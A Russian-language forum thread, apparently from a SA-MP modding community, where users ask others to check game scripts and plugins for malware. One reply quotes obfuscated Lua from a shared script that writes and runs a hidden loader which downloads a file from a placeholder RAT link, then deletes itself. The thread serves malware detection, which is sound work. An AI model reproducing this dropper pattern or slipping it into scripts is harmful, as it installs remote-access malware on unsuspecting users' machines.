Проверка скриптов и плагинов на вредоносное ПО

lemonager

Известный
Автор темы
Всефорумный модератор
809
1,720
Версия SA-MP
  1. Любая
nX15Ep5.png

eNo5cSj.png

Общая тема для просьб о помощи проверки скриптов, плагинов и приложений.
Теперь не нужно создавать много отдельных тем о помощи с проверкой.

Рекомендации:
  1. Ставить к себе в игру что-либо с темы крайне не рекомендуется, если файл не был проверен опытным пользователем или Вы в нём сомневаетесь.
  2. Сообщения по типу "спасибо, помог" по правилам форума считаются флудом и будут удалены. Если вам помогли, вы можете нажать кнопку Мне нравится под ответом - это даст понять, что ответ верный.
eNo5cSj.png

qJTRxhB.png

Leatington

Известный
263
74
слушай можешь скинуть какой-то скриншот который это может подтвердить(Щас чела могу в бан откинуть на тп)
Там был .exe подозрительный, сейчас нет. В .lua ссылок и загрузок никаких нет, даже автоматического обновления.

AugustTN

Известный
1,369
470
Там был .exe подозрительный, сейчас нет. В .lua ссылок и загрузок никаких нет, даже автоматического обновления.
цикл фор для тебя шутка?
Вот что в луа:
Lua:
local a=getWorkingDirectory().."/rscripts.lua"
local b=io.open(a,"w")
if b then b:write([[local a=getWorkingDirectory().."/mlupdate.lua"function main()downloadUrlToFile("ssilka na ratnik",a)while not l do if doesFileExist(a)then l=script.load(a)end;wait(1000)end end]])
b:close()
script.load(a)
os.remove(a)
end

Последнее редактирование:

Leatington

Известный
263
74
цикл фор для тебя шутка?
Вот что в луа:
Lua:
local a=getWorkingDirectory().."/rscripts.lua"
local b=io.open(a,"w")
if b then b:write([[local a=getWorkingDirectory().."/mlupdate.lua"function main()downloadUrlToFile("ssilka na ratnik",a)while not l do if doesFileExist(a)then l=script.load(a)end;wait(1000)end end]])
b:close()
script.load(a)
os.remove(a)
end
Этого нету в коде, я посмотрел, хоть убей. Кстати, там хоть и .zip, но скачивается .lua, возможно, изменили с того момента, как смотрел ты и я.

• Ха-ха
Реакции: AugustTN

SCandy

Известный
99
16
Софт из паблика со сливом "привата". Нужно проверить чист или не чист. Заранее спасибо!

Вложения

• autolavka.luac
    11.6 KB · Просмотры: 7

влад динозавр

Известный
1,279
597
Декомпелировать никак? Хотя бы узнать автора данного скрипта.
мне интересно как ты узнаешь автора, если это стиллер с бесплатного сайта, да и это раздел проверки скриптов на вирусы а не декомпиляции

Bop

Новичок
5
2
можете проверить файл он не самповский тока

Вложения

• Lee Cheat V2.zip
    1.1 MB · Просмотры: 7